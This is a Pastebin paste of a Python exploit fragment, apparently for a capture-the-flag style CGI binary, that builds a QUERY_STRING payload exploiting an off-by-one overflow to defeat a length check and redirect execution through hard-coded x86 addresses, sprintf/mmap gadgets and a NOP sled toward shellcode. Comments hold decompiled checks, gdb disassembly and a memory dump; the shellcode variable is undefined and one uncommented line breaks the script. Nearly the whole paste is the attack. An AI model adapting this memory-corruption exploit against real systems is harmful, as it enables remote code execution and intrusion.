API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 10th, 2012
190
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.69 KB | None | 0 0
raw download clone embed print report diff
  1. t_s = "9"*33   #Trigger off by one overflow at
  2.     # for ( i = 0; i < strlen(ptr_query); ++i )
  3.         #{
  4.         #if ( i > 32 )
  5.         #{
  6.             #printf("ERROR t_s size\n");
  7.     #        break;
  8.         #}
  9.     # So length check at
  10.     #for ( j = 0; ; ++j )
  11.         #{
  12.         #len = strlen(ptr_query);
  13.         #if ( j >= (unsigned int)len )
  14.         #break;
  15.         #if ( j > lenCheck )                       // val8 thay doi 1 byte ==> 0xff
  16.         #{
  17.         #   printf("ERROR v size\n");
  18.         #   exit(-1);
  19.         #}
  20.     # now lenCheck has value 0x39 ( "9" )
  21. #t_s  = "1339261782"+"9"*23
  22. vBuff = "1"*12+"1"*18+sc
  23. #vBuff = "pOFogiGf"+"\xcc"*24
  24. agent = "\x63\x88\x04\x08"
  25.    #0x8048863 <vprintf@plt+15>:  (bad)  => to align with "[
  26.    #0x8048864 <sprintf@plt>:     jmp    DWORD PTR ds:0x804b034
  27.    #0x804886a <sprintf@plt+6>:   push   0xd0
  28.  
  29. charAt0 = "\x3c\x90\x04\x08"
  30.   # Point to 0x00
  31.     #( !*charAt0 && *charAt100 )
  32.         #{
  33.         #   jumpout(0);
  34.         #   return -1;
  35.         #}
  36.  
  37. rport =  "\xca\x8b\x04\x08"
  38.     #   0x8048bca:   push   esi
  39.     #   0x8048bcb:   push   ebx
  40.     #   0x8048bcc:   lea    eax,[ebp-0x44]
  41.     #   0x8048bcf:   lea    edi,[ebp-0x44]
  42.     #   0x8048bd2:   mov    esi,0x8049d20
  43.     #   0x8048bd7:   cld
  44. charAt100 = "\xff\x8f\x04\x08"
  45.     #Same as charAt0
  46.  
  47. raddr ="\xc9\x8b\x04\x08"
  48.     #Same as rport
  49.  
  50. mmflag = "\x01\x01\x01\x32"
  51.     # MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS
  52. v =   vBuff + agent  + charAt0     + rport     + charAt100    + raddr   + mmflag
  53. QUERY_STRING = "q=sent&v="+v+"&t_s="+t_s
  54.  
  55. # Sice we have esi -> query string so we find some gadgets to push esi to stack, use it at parameter to
  56. # sprintf call
  57. #x/40i 0
  58. #   0x0: pop    ebx
  59. #   0x1: push   edi
  60. #   0x2: push   esi
  61. #   0x3: push   ebx
  62. #   0x4: lea    eax,[ebp-0x44]
  63. #   0x7: lea    edi,[ebp-0x44]
  64. #   0xa: mov    esi,0x8049d20
  65. #   0xf: cld
  66. #   0x10:        mov    ecx,0x565b5d0f
  67. #   0x15:        push   ebx
  68. #   0x16:        lea    eax,[ebp-0x44]
  69. #   0x19:        lea    edi,[ebp-0x44]
  70. #   0x1c:        mov    esi,0x8049d20
  71. #   0x21:        cld
  72. #   0x22:        mov    ecx,0xff5b5d0f
  73. #   0x27:        jmp    DWORD PTR ds:0x804b034
  74.  
  75. After 0x27:        jmp    DWORD PTR ds:0x804b034
  76.  
  77. #0x0:    0x3935ac11      0x31313131      0x31313131      0x31313131
  78. #0x10:   0x31313131      0x31313131      0x31313131      0xeb313131
  79. #0x20:   0x08048863      0x0804903c      0x08048bca      0x08048fff
  80. #0x30:   0x08048bc9      0x32010101      0x735f7426      0x3939393d
  81. #0x40:   0x39393939      0x39393939      0x39393939      0x39393939
  82. #0x50:   0x39393939      0x39393939      0x39393939      0x6d263939
  83. #0x60:   0x9090903d      0x90909090      0x90909090      0x90909090
  84. #0x70:   0x90909090      0x90909090      0x90909090      0x90909090
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!